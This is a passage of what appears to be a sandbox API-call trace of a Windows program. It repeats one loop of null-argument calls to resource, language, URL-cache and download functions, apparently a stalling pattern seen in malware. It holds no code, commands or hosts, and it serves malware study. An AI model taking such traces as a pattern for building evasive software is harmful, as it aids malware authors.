lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.904] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.904] GetUserDefaultLangID () returned 0x409 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.904] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.904] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.904] GetUserDefaultLangID () returned 0x409 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.904] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.904] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.904] GetUserDefaultLangID () returned 0x409 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.905] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.905] GetUserDefaultLangID () returned 0x409 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.905] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.905] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.905] GetUserDefaultLangID () returned 0x409 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.905] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.905] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.905] GetUserDefaultLangID () returned 0x409 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.905] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.905] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.905] GetUserDefaultLangID () returned 0x409 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.905] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.905] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.905] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.905] GetUserDefaultLangID () returned 0x409 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.905] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.905] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.905] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.906] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.906] GetUserDefaultLangID () returned 0x409 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.906] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.906] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.906] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.906] GetUserDefaultLangID () returned 0x409 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.906] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.906] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.906] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.906] GetUserDefaultLangID () returned 0x409 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.906] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.906] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.906] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.906] GetUserDefaultLangID () returned 0x409 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.906] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.906] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.906] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.906] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.906] GetUserDefaultLangID () returned 0x409 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.906] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.906] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.906] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.907] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.907] GetUserDefaultLangID () returned 0x409 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.907] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.907] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.907] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.907] GetUserDefaultLangID () returned 0x409 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.907] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.907] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.907] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.907] GetUserDefaultLangID () returned 0x409 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.907] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.907] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.907] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.907] GetUserDefaultLangID () returned 0x409 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.907] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.907] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.907] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.907] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.907] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.908] GetUserDefaultLangID () returned 0x409 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.908] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.908] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.908] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.908] GetUserDefaultLangID () returned 0x409 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.908] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.908] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.908] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.908] GetUserDefaultLangID () returned 0x409 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.908] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.908] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.908] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.908] GetUserDefaultLangID () returned 0x409 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.908] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.908] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.908] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.908] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.908] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.908] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.909] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.909] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.909] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.909] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.909] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.909] GetUserDefaultLangID () returned 0x409 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.909] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.909] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.909] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.909] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, 